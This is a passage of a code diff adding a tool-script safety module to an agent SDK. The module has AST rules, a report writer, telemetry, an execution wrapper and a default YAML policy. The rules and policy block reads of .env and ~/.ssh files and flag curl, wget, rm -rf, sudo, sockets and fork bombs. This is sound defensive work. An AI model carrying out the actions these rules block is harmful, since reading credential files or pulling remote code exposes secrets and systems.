EnvFileReadRule(PythonPathReadRule): + """Detect reads of .env files.""" + + @property + def rule_id(self) -> str: + return "python.read_env_file" + + message = "Python code reads a .env file." + + def path_matches(self, path: str, policy: SafetyPolicy) -> bool: + return policy.is_path_blocked(self.rule_id, path) + + +class SshPathReadRule(PythonPathReadRule): + """Detect reads of ~/.ssh paths.""" + + @property + def rule_id(self) -> str: + return "python.read_ssh_path" + + message = "Python code reads a ~/.ssh path." + + def path_matches(self, path: str, policy: SafetyPolicy) -> bool: + return policy.is_path_blocked(self.rule_id, path) + + +class PythonScanner: + """Convenience scanner using the default Python safety rules.""" + + def __init__(self, rules: Optional[list[Rule]] = None, policy: Optional[SafetyPolicy] = None): + self._checker = SafetyChecker(rules or create_python_rules(), policy) + + async def scan(self, source: str, policy: Optional[SafetyPolicy] = None) -> SafetyResult: + """Scan Python source and return a safety result.""" + request = ToolExecutionRequest(language="python", script=source) + return await self._checker.check(request, policy) + + +def create_python_rules() -> list[Rule]: + """Create the built-in Python AST safety rules.""" + return [ + OsSystemRule(), + SubprocessRunRule(), + SubprocessPopenRule(), + ShutilRmtreeRule(), + EnvFileReadRule(), + SshPathReadRule(), + RequestsGetPostRule(), + SocketConnectRule(), + ] + + +def _extract_python_source(request: ToolExecutionRequest) -> str: + language = (request.language or request.metadata.get("language") or "").strip().lower() + if language and language not in _PYTHON_LANGUAGES: + return "" + for value in ( + request.script, + request.args.get("code"), + request.args.get("script"), + request.metadata.get("code"), + request.metadata.get("script"), + request.metadata.get("python_code"), + ): + if isinstance(value, str) and value.strip(): + return value + return "" + + +def _is_file_read_call(node: ast.Call, context: PythonScanContext) -> bool: + call_name = context.resolve_call_name(node.func) + if call_name in {"open", "builtins.open", "io.open"}: + return _mode_reads(node, default=True) + if call_name.endswith(".open"): + return _mode_reads(node, default=True) + return call_name.endswith(".read_text") or call_name.endswith(".read_bytes") + + +def _mode_reads(node: ast.Call, default: bool) -> bool: + mode = None + if len(node.args) >= 2 and isinstance(node.args[1], ast.Constant) and isinstance(node.args[1].value, str): + mode = node.args[1].value + for keyword in node.keywords: + if keyword.arg == "mode" and isinstance(keyword.value, ast.Constant) and isinstance(keyword.value.value, str): + mode = keyword.value.value + break + if mode is None: + return default + return "r" in mode or "+" in mode + + +def _path_strings_from_read_call(node: ast.Call) -> list[str]: + candidates: list[ast.AST] = [] + if _is_path_method_call(node): + value = node.func.value # type: ignore[union-attr] + if isinstance(value, ast.Call): + candidates.extend(value.args) + candidates.extend(keyword.value for keyword in value.keywords if keyword.arg in {"path", "file"}) + else: + candidates.append(value) + else: + if node.args: + candidates.append(node.args[0]) + candidates.extend(keyword.value for keyword in node.keywords if keyword.arg in {"file", "path"}) + strings: list[str] = [] + for candidate in candidates: + strings.extend(_literal_strings(candidate)) + return strings + + +def _is_path_method_call(node: ast.Call) -> bool: + return isinstance(node.func, ast.Attribute) and node.func.attr in {"open", "read_text", "read_bytes"} + + +def _literal_strings(node: ast.AST) -> list[str]: + strings: list[str] = [] + for child in ast.walk(node): + if isinstance(child, ast.Constant) and isinstance(child.value, str): + strings.append(child.value) + return strings + + +def _domain_from_call(node: ast.Call) -> str: + for arg in node.args: + for value in _literal_strings(arg): + domain = _domain_from_string(value) + if domain: + return domain + for keyword in node.keywords: + for value in _literal_strings(keyword.value): + domain = _domain_from_string(value) + if domain: + return domain + return "" + + +def _domain_from_string(value: str) -> str: + value = value.strip() + if not value: + return "" + parsed = urlparse(value) + if parsed.hostname: + return parsed.hostname.lower() + host = value.split("/", 1)[0].split(":", 1)[0].strip() + return host.lower() diff --git a/trpc_agent_sdk/tools/safety/report.py b/trpc_agent_sdk/tools/safety/report.py new file mode 100644 index 00000000..18e8e746 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/report.py @@ -0,0 +1,80 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Stable JSON report generation for tool safety checks.""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any + +from .audit import risk_level +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest + +DEFAULT_REPORT_FILE = Path("tool_safety_report.json") + + +class SafetyReportWriter: + """Write the latest tool safety result as a stable JSON report.""" + + def __init__(self, path: str | Path = DEFAULT_REPORT_FILE): + self._path = Path(path) + + @property + def path(self) -> Path: + """Return the report path.""" + return self._path + + def write(self, result: SafetyResult) -> None: + """Write one report file.""" + report = build_report(result) + with self._path.open("w", encoding="utf-8") as fp: + json.dump(report, fp, ensure_ascii=False, indent=2, sort_keys=True) + fp.write("\n") + + +def build_report(result: SafetyResult) -> dict[str, Any]: + """Build a stable, monitor-friendly report object.""" + request = result.request or ToolExecutionRequest() + findings = result.findings or [] + rule_ids = [finding.rule_id for finding in findings] + return { + "schema_version": "v1", + "decision": result.decision.value, + "risk_level": risk_level(findings).value, + "rule_id": ",".join(rule_ids), + "rule_ids": rule_ids, + "evidence": [_evidence(finding) for finding in findings], + "recommendation": _recommendation(result), + "tool_name": request.tool_name, + "agent_name": request.agent_name, + "invocation_id": request.invocation_id, + "function_call_id": request.function_call_id, + "language": request.language, + "finding_count": len(findings), + "blocked": result.decision != SafetyDecision.ALLOW, + } + + +def _evidence(finding: Finding) -> dict[str, Any]: + return { + "rule_id": finding.rule_id, + "severity": finding.severity.value, + "message": finding.message, + "target": finding.target, + "metadata": finding.metadata, + } + + +def _recommendation(result: SafetyResult) -> str: + if result.decision == SafetyDecision.DENY: + return "Do not execute this tool call. Review the reported rule findings and modify the script or policy." + if result.decision == SafetyDecision.NEEDS_HUMAN_REVIEW: + return "Require human review before executing this tool call." + return "No blocking safety findings. Continue execution." diff --git a/trpc_agent_sdk/tools/safety/telemetry.py b/trpc_agent_sdk/tools/safety/telemetry.py new file mode 100644 index 00000000..4f8b071a --- /dev/null +++ b/trpc_agent_sdk/tools/safety/telemetry.py @@ -0,0 +1,29 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Optional OpenTelemetry attributes for tool safety checks.""" + +from __future__ import annotations + +from .audit import risk_level +from .models import SafetyResult + + +def record_safety_attributes(result: SafetyResult) -> None: + """Record tool safety attributes on the current OpenTelemetry span when available.""" + try: + from opentelemetry import trace # pylint: disable=import-outside-toplevel + except Exception: # pylint: disable=broad-except + return + + try: + span = trace.get_current_span() + if span is None: + return + span.set_attribute("tool.safety.decision", result.decision.value) + span.set_attribute("tool.safety.risk_level", risk_level(result.findings).value) + span.set_attribute("tool.safety.rule_id", ",".join(finding.rule_id for finding in result.findings)) + except Exception: # pylint: disable=broad-except + return diff --git a/trpc_agent_sdk/tools/safety/tool_safety_policy.yaml b/trpc_agent_sdk/tools/safety/tool_safety_policy.yaml new file mode 100644 index 00000000..003f1e8a --- /dev/null +++ b/trpc_agent_sdk/tools/safety/tool_safety_policy.yaml @@ -0,0 +1,83 @@ +# Default policy for tool script safety checks. +enabled: true +default_decision: allow + +deny_severities: + - high + - critical +review_severities: + - medium + +allowed_domains: [] +blocked_paths: + - .env + - ~/.ssh +allowed_commands: [] +max_timeout: 3600 +max_output_size: 1048576 + +severity: + default: high + python.requests_get_post: medium + python.socket_connect: medium + bash.shell_pipe: medium + bash.background_execution: medium + bash.long_sleep: medium + +rule_configs: + python.os_system: + severity: high + allowed_commands: [] + python.subprocess_run: + severity: high + allowed_commands: [] + python.subprocess_popen: + severity: high + allowed_commands: [] + python.shutil_rmtree: + severity: high + allowed_commands: [] + python.read_env_file: + severity: high + blocked_paths: + - .env + python.read_ssh_path: + severity: high + blocked_paths: + - ~/.ssh + python.requests_get_post: + severity: medium + allowed_domains: [] + python.socket_connect: + severity: medium + allowed_domains: [] + bash.rm_rf: + severity: high + allowed_commands: [] + bash.curl: + severity: high + allowed_commands: [] + bash.wget: + severity: high + allowed_commands: [] + bash.sudo: + severity: high + allowed_commands: [] + bash.apt_install: + severity: high + allowed_commands: [] + bash.pip_install: + severity: high + allowed_commands: [] + bash.npm_install: + severity: high + allowed_commands: [] + bash.background_execution: + severity: medium + bash.shell_pipe: + severity: medium + bash.fork_bomb: + severity: critical + bash.long_sleep: + severity: medium + max_timeout: 3600 diff --git a/trpc_agent_sdk/tools/safety/wrapper.py b/trpc_agent_sdk/tools/safety/wrapper.py new file mode 100644 index 00000000..b2e96cfe --- /dev/null +++ b/trpc_agent_sdk/tools/safety/wrapper.py @@ -0,0 +1,48 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Lightweight wrappers for applying safety checks before execution.""" + +from __future__ import annotations + +from typing import Any +from typing import Awaitable +from typing import Callable +from typing import Optional + +from .checker import SafetyChecker +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest +from .policy import SafetyPolicy + +ExecutionHandler = Callable[[], Awaitable[Any]] + + +class SafetyViolationError(RuntimeError): + """Raised when a safety result blocks execution.""" + + def __init__(self, result: SafetyResult): + self.result = result + super().__init__(f"tool execution blocked by safety policy: {result.decision.value}") + + +class SafetyExecutionWrapper: + """Apply a checker before invoking an async execution handler.""" + + def __init__(self, checker: Optional[SafetyChecker] = None, policy: Optional[SafetyPolicy] = None): + self._checker = checker or SafetyChecker(policy=policy) + self._policy = policy + + async def check(self, request: ToolExecutionRequest) -> SafetyResult: + """Run the configured checker.""" + return await self._checker.check(request, self._policy) + + async def run(self, request: ToolExecutionRequest, handler: ExecutionHandler) -> Any: + """Check a request and run the handler when allowed.""" + result = await self.check(request) + if result.decision != SafetyDecision.ALLOW: + raise SafetyViolationError(result) + return await handler()